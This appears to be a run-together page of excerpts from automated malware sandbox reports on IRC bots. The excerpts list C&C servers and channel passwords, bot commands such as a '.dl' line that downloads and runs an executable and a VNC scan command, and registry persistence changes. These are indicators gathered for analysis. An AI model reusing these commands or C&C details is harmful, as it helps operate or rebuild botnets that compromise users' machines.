Host Name IP Addressdell-d3e62f7e26 10.1.12.2drego85.dyndns.org 67.220.65.39 * C&C Server: 67.220.65.39:6667 * Server Password: * Username: XP-2174 * Nickname: [00|DEU|707227] * Channel: #imbot (Password: config) * Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:startme32.exe 1

* Requested Host: net.anddos.co.uk* Resulting Address: 94.23.153.223 * IRC Data o User Name: zgtlat o Host Name: “” o Server Name: o Real Name: zgtlat o Password: dickybob o Nick Name: ncrrpk o Non RFC Conform: 1 + Channel # Name: #ohai3 # Password: trb123trb + Notice Message Deleted # Value: :irc.goonet.net NOTICE AUTH :***Read more...

DNS LookupHost Name IP Address0 127.0.0.1shitit.net shitit.net 75.126.252.200UDP ConnectionsRemote IP Address: 127.0.0.1 Port: 1045Send Datagram: 53 packet(s) of size 1Recv Datagram: 53 packet(s) of size 1Download URLshttp://75.126.252.200/fly3.jpg (shitit.net)Outgoing connection to remote server: shitit.net TCP port 80DNS LookupHost Name IP Addressdell-d3e62f7e26 10.1.10.2sip4.voipkosovasite.com 82.114.87.46 * C&C Server: 82.114.87.46:1868 * Server Password: * Username: XP-9971 * Nickname: [00|DEU|994663]Read more...

Remote Host Port Number213.239.201.80 8000213.239.201.80 80 * The data identified by the following URL was then requested from the remote web server: o http://nero872.cn/a/ Registry Modifications * The following Registry Keys were created: o HKEY_CURRENT_USERSoftwareMinisoft o HKEY_CURRENT_USERSoftwareVideohost o HKEY_CURRENT_USERSoftwareXML * The following Registry Keys were deleted: o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimal o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalAppMgmt o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalBase o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalBoot BusRead more...

Remote Host Port Number66.90.110.138 7070 MODE [CPF|USA|00|P|20484] -ixJOIN #FUD f1f4fudPRIVMSG #FUD :[IM]: Thread Activated: Sending Message.PONG Buchananas21.Coupe.MxNICK [CPF|USA|00|P|20484]USER XP-9366 * 0 :COMPUTERNAME PASS couperlz Other details * The following port was open in the system: Port Protocol Process1053 TCP baeksyesrn.exe (%Windir%baeksyesrn.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows SecRead more...

85.214.114.224:6668 Nick: AUT[XP]1627252Username: phuznpvJoined Channel: ##tomillarChannel Topic for Channel ##tomillar: “.asc vnc 75 0 0 -r -b “Private Message to Channel ##tomillar: “[REALMBOT] Random Exploitation started on 192.168.x.x:5900 waiting 5 seconds for 0 minutes using 75 threads.”

java1.webhop.net 89.148.0.52java2.webhop.net Outgoing connection to remote server: java1.webhop.net TCP port 443Outgoing connection to remote server: java1.webhop.net TCP port 443 Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{54AF1E87-2769-558F-34E9-EC1E2A442DD1} “StubPath” = C:WINDOWSsystem32widll.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “widll” = C:WINDOWSsystem32widll.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftAdvanced INF Setup “AdvpackLogFile”HKEY_LOCAL_MACHINESOFTWAREClassesHTTPshellopencommand “”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{54AF1E87-2769-558F-34E9-EC1E2A442DD1} “StubPath”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “widll” File Changes by all processesNew Files C:WINDOWSsystem32widll.exeDeviceRasAcdOpened Files C:rxvtermc:PIUD.EXEC:WINDOWSsystem32widll.exeDeletedRead more...

189.19.68.201:6667 Nick: AUT|m0d4|732363Username: zqtihakzServer Pass: analJoined Channel: ##AnaL## with Password a

Remote Host Port Number64.89.27.36 51987 NICK pLagUe{USA}72995MODE pLagUe{USA}72995 -ixJOIN #treesPONG irc.lulz.eeUSER SkuZ * okTeaM UniX b0at 0.4PRIVMSG #trees :New PC Infected. Other details * The following port was open in the system: Port Protocol Process1052 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + raidhost = “raidhost.exe” so thatRead more...

69.147.233.136:6667 NICK n-611470USER vupyrjg 0 0 :n-611470USERHOST n-611470MODE n-611470 -x+BJOIN #AlexBotNOTICE n-611470 :.VERSION mIRC v6.12 Khaled Mardam-Bey.PRIVMSG #AlexBot :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.PRIVMSG #AlexBot :[MAIN]: Bot ID: AlexBot.PRIVMSG #AlexBot :[Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 0m.PRIVMSGRead more...